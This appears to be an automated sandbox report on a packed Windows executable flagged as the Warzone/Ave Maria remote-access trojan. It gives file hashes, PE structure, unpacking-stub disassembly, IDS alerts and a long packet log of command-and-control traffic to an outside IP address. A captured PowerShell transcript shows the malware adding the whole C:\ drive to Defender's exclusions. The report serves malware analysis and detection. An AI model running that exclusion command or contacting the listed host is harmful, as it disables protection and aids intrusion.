                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):5048
                                                                  Entropy (8bit):5.393687137718255
                                                                  Encrypted:false
                                                                  SSDEEP:96:BZ9h2N5dqDo1ZEZ6h2N5dqDo1ZQM6UjZoh2N5dqDo1ZFFEERZo:OINQ
                                                                  MD5:CD40D7F27D7F40B312A0A16DBE7ACE72
                                                                  SHA1:A66F76313958430BF10322D8428A43ACE8DDBF4E
                                                                  SHA-256:C0A23C24DF8C9D780BD4D84A63AA4AD9AB61C416349B1E4A8F76087EE294A06A
                                                                  SHA-512:A3920F40E3708648D47162DD70C400F2990150E68B4DBD7BFBCFAF95FDFC89D378FB479982EFBBAC9BE02E3E16D7C689569F831AC04F7E970FB64933C4DA7BF2
                                                                  Malicious:false
                                                                  Preview:.**********************..Windows PowerShell transcript start..Start time: 20220522123336..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 301389 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell Add-MpPreference -ExclusionPath C:\..Process ID: 6368..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220522123336..**********************..PS>Add-MpPreference -ExclusionPath C:\..**********************..Windows PowerShell transcript start..Start time: 20220522123656..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 301389 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell Add-MpPreference -Exclus

                                                                  \Device\ConDrv

                                                                  Download File
                                                                  Process:C:\Windows\System32\wbem\WMIC.exe
                                                                  File Type:ASCII text, with CRLF, CR line terminators
                                                                  Category:dropped
                                                                  Size (bytes):140
                                                                  Entropy (8bit):5.001523394375711
                                                                  Encrypted:false
                                                                  SSDEEP:3:YwM2FgCKGWMRX1eRHXWXKSovrj4WA3iygK5k3koZ3Pveys36JQAimXv:Yw7gJGWMXJXKSOdYiygKkXe/qeAiY
                                                                  MD5:DA5950D62F7968DA1F66E3811A9061F9
                                                                  SHA1:69B83F624AA9EC9EA09BE0E165499B436101F9EA
                                                                  SHA-256:C09AF5F39B8BF613C007465A63F70E84766710CEE7FEB62780433C9D8C248AD7
                                                                  SHA-512:6291C46BC66AEC7AEB973EE076146AF54C800A63F3F6F9C0EF01DA6535539E2F44FBF0BACBEAF66C4D34C4BE122AD728F62681E408FA710127120806D952DC9E
                                                                  Malicious:false
                                                                  Preview:Executing (Win32_Process)->Create()...Method execution successful....Out Parameters:..instance of __PARAMETERS..{...ReturnValue = 9;..};....

                                                                  Static File Info

                                                                  General

                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                  Entropy (8bit):7.862505245807072
                                                                  TrID:
                                                                  • Win32 Executable (generic) a (10002005/4) 99.66%
                                                                  • UPX compressed Win32 Executable (30571/9) 0.30%
                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                  File name:SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe
                                                                  File size:222720
                                                                  MD5:dabc6f0c75c134e5310ba3526adba833
                                                                  SHA1:854ec103a64182c97e8f25e45da04889dbbbf3ff
                                                                  SHA256:9f9bae001065a649a78ce6de997f160ef32d03a2c28f4633a8386f75c938cadf
                                                                  SHA512:c596890bf6062890483e9ee276c890b04396c8c6c758b318ab0d218c506ae362db32e13faf9691b2b96d5a4ede03ee107c5b01714ab06c86c465ebd23326e877
                                                                  SSDEEP:6144:DcsB/VWq2pmz2WGO3LPJRWE/4F0xXKk7ETkFI49Poih:DciKMoO3LDn4uxXKk7FI4d
                                                                  TLSH:56241287323D8975D465A27C079AD56083B8FE074D9B853F615A338F4EBE472036EB20
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..............................................................................................1.......Y.............Rich...

                                                                  File Icon

                                                                  Icon Hash:00828e8e8686b000

                                                                  Static PE Info

                                                                  General

                                                                  Entrypoint:0x553b50
                                                                  Entrypoint Section:UPX1
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                  DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                  Time Stamp:0x62861233 [Thu May 19 09:47:31 2022 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:6
                                                                  OS Version Minor:0
                                                                  File Version Major:6
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:6
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:12223521b494f53df3a1fd878d789144

                                                                  Entrypoint Preview

                                                                  Instruction
                                                                  pushad
                                                                  mov esi, 0051F000h
                                                                  lea edi, dword ptr [esi-0011E000h]
                                                                  mov dword ptr [edi+0014B3ACh], 0BA0189Ah
                                                                  push edi
                                                                  jmp 00007FDC94A25773h
                                                                  nop
                                                                  nop
                                                                  nop
                                                                  nop
                                                                  nop
                                                                  nop
                                                                  nop
                                                                  mov al, byte ptr [esi]
                                                                  inc esi
                                                                  mov byte ptr [edi], al
                                                                  inc edi
                                                                  add ebx, ebx
                                                                  jne 00007FDC94A25769h
                                                                  mov ebx, dword ptr [esi]
                                                                  sub esi, FFFFFFFCh
                                                                  adc ebx, ebx
                                                                  jc 00007FDC94A2574Fh
                                                                  mov eax, 00000001h
                                                                  add ebx, ebx
                                                                  jne 00007FDC94A25769h
                                                                  mov ebx, dword ptr [esi]
                                                                  sub esi, FFFFFFFCh
                                                                  adc ebx, ebx
                                                                  adc eax, eax
                                                                  add ebx, ebx
                                                                  jnc 00007FDC94A2576Dh
                                                                  jne 00007FDC94A2578Ah
                                                                  mov ebx, dword ptr [esi]
                                                                  sub esi, FFFFFFFCh
                                                                  adc ebx, ebx
                                                                  jc 00007FDC94A25781h
                                                                  dec eax
                                                                  add ebx, ebx
                                                                  jne 00007FDC94A25769h
                                                                  mov ebx, dword ptr [esi]
                                                                  sub esi, FFFFFFFCh
                                                                  adc ebx, ebx
                                                                  adc eax, eax
                                                                  jmp 00007FDC94A25736h
                                                                  add ebx, ebx
                                                                  jne 00007FDC94A25769h
                                                                  mov ebx, dword ptr [esi]
                                                                  sub esi, FFFFFFFCh
                                                                  adc ebx, ebx
                                                                  adc ecx, ecx
                                                                  jmp 00007FDC94A257B4h
                                                                  xor ecx, ecx
                                                                  sub eax, 03h
                                                                  jc 00007FDC94A25773h
                                                                  shl eax, 08h
                                                                  mov al, byte ptr [esi]
                                                                  inc esi
                                                                  xor eax, FFFFFFFFh
                                                                  je 00007FDC94A257D7h
                                                                  sar eax, 1
                                                                  mov ebp, eax
                                                                  jmp 00007FDC94A2576Dh
                                                                  add ebx, ebx
                                                                  jne 00007FDC94A25769h
                                                                  mov ebx, dword ptr [esi]
                                                                  sub esi, FFFFFFFCh
                                                                  adc ebx, ebx
                                                                  jc 00007FDC94A2572Eh
                                                                  inc ecx
                                                                  add ebx, ebx
                                                                  jne 00007FDC94A25769h
                                                                  mov ebx, dword ptr [esi]
                                                                  sub esi, FFFFFFFCh
                                                                  adc ebx, ebx
                                                                  jc 00007FDC94A25720h
                                                                  add ebx, ebx
                                                                  jne 00007FDC94A25769h
                                                                  mov ebx, dword ptr [esi]
                                                                  sub esi, FFFFFFFCh
                                                                  adc ebx, ebx
                                                                  adc ecx, ecx
                                                                  add ebx, ebx
                                                                  jnc 00007FDC94A25751h
                                                                  jne 00007FDC94A2576Bh
                                                                  mov ebx, dword ptr [esi]
                                                                  sub esi, FFFFFFFCh
                                                                  adc ebx, ebx
                                                                  jnc 00007FDC94A25746h
                                                                  add ecx, 02h
                                                                  cmp ebp, 00000000h

                                                                  Data Directories

                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x154e5c0x1c0.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x1540000xe5c.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x15501c0x28.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x153d4c0x18UPX1
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x153d6c0xc0UPX1
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                  Sections

                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  UPX00x10000x11e0000x0False0empty0.0IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  UPX10x11f0000x350000x35000False0.97481666421data7.88845284004IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                  .rsrc0x1540000x20000x1200False0.366102430556data3.93920974475IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

                                                                  Resources

                                                                  NameRVASizeTypeLanguageCountry
                                                                  TYPELIB0x15418c0x834dataEnglishUnited States
                                                                  RT_DIALOG0x14dce00x1aedataEnglishUnited States
                                                                  RT_STRING0x14de900x2edataEnglishUnited States
                                                                  RT_VERSION0x1549c40x314dataEnglishUnited States
                                                                  RT_MANIFEST0x154cdc0x17dXML 1.0 document textEnglishUnited States

                                                                  Imports

                                                                  DLLImport
                                                                  ADVAPI32.dllAccessCheck
                                                                  GDI32.dllGetTextExtentPoint32A
                                                                  KERNEL32.DLLLoadLibraryA, ExitProcess, GetProcAddress, VirtualProtect
                                                                  ole32.dllCoInitialize
                                                                  OLEAUT32.dllSysFreeString
                                                                  SHELL32.dllSHGetFileInfoA
                                                                  USER32.dllGetDC

                                                                  Version Infos

                                                                  DescriptionData
                                                                  LegalCopyright Microsoft Corporation. All rights reserved.
                                                                  InternalNameATLDUCK
                                                                  FileVersion1, 0, 0, 1
                                                                  CompanyName
                                                                  ProductNameatlduck Module
                                                                  OLESelfRegister
                                                                  ProductVersion1, 0, 0, 1
                                                                  FileDescriptionatlduck Module
                                                                  OriginalFilenameATLDUCK.DLL
                                                                  Translation0x0409 0x04b0

                                                                  Possible Origin

                                                                  Language of compilation systemCountry where language is spokenMap
                                                                  EnglishUnited States

                                                                  Network Behavior

                                                                  Snort IDS Alerts

                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                  192.168.2.323.227.202.1574974080802834979 05/22/22-12:33:29.604971TCP2834979ETPRO TROJAN Ave Maria/Warzone RAT Encrypted CnC Checkin497408080192.168.2.323.227.202.157
                                                                  23.227.202.157192.168.2.38080497402841903 05/22/22-12:33:29.434739TCP2841903ETPRO TROJAN Ave Maria/Warzone RAT Encrypted CnC Checkin (Inbound)80804974023.227.202.157192.168.2.3

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  May 22, 2022 12:33:29.163681984 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:29.296467066 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:29.296816111 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:29.434739113 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:29.604970932 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:29.769226074 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:29.770284891 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:29.953881025 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:29.954632044 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:30.137533903 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.420416117 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.420444012 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.420460939 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.420485020 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.420510054 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.420609951 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:30.420645952 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:30.553220987 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.553282976 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.553324938 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.553369045 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.553412914 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:30.553426981 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.553471088 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.553472042 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:30.553512096 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.553546906 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:30.553561926 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.553594112 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.553661108 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:30.686826944 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.686891079 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.686939001 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.686978102 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.687000036 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:30.687016964 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.687046051 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:30.687060118 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.687100887 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.687140942 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.687141895 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:30.687180996 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.687217951 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.687257051 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:30.687258959 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.687273979 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:30.687299013 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.687340021 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.687412977 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:30.687418938 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.687458038 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.687479973 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:30.687499046 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.687530994 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.687588930 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:30.820411921 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.820503950 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.820561886 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.820605993 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:30.820616007 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.820658922 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.820702076 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.820735931 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:30.820755959 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.820768118 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:30.820805073 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.820844889 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.820872068 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:30.820894003 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.820935965 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.820965052 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:30.820995092 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.821037054 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.821079969 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.821100950 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:30.821135044 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.821176052 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.821212053 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:30.821228981 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:30.821230888 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.821276903 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.821319103 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.821356058 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:30.821368933 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.821409941 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.821453094 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.821477890 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:30.821499109 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.821541071 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.821567059 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:30.821594954 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.821604013 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:30.821641922 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.821681976 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.821716070 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:30.821729898 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.821770906 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.821813107 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.821840048 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:30.821858883 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.821901083 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.821928978 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:30.821942091 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.821969986 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:30.954526901 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.954583883 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.954623938 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.954668999 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.954699993 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:30.954734087 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.954746962 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:30.954794884 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.954842091 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.954902887 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.954904079 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:30.954952002 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.954972029 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:30.955004930 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.955050945 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.955095053 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:30.955111027 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.955157995 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.955192089 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:30.955204964 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.955245972 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.955284119 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:30.955296040 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.955341101 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.955401897 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.955403090 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:30.955445051 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.955492020 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:30.955504894 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.955549002 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.955602884 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:30.955605984 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.955648899 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.955689907 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:30.955702066 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.955745935 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.955780983 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:30.955804110 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.955837011 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.955877066 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:30.955888987 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.955929995 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.955982924 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.955996990 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:30.956037045 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.956114054 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:31.978198051 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:32.114612103 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.114674091 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.114716053 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.114753962 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.114794016 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.114847898 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:32.114859104 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.114890099 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.114902973 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:32.114933968 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.114948988 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:32.114978075 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.115017891 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.115056992 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:32.115061045 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.115070105 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:32.115103006 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.115140915 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.115181923 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.115184069 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:32.115221024 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.115261078 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.115278006 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:32.115303993 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.115319967 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:32.115344048 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.115384102 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.115401030 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:32.115425110 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.115463018 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.115504026 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.115536928 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:32.115542889 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.115573883 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:32.115585089 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.115628004 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.115665913 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.115673065 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:32.115709066 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.115747929 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.115766048 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:32.115789890 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.115830898 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.115861893 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.115891933 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.115921974 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.115962982 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.115998983 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:32.116003990 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.116041899 CEST80804974023.227.202.157192.168.2.3
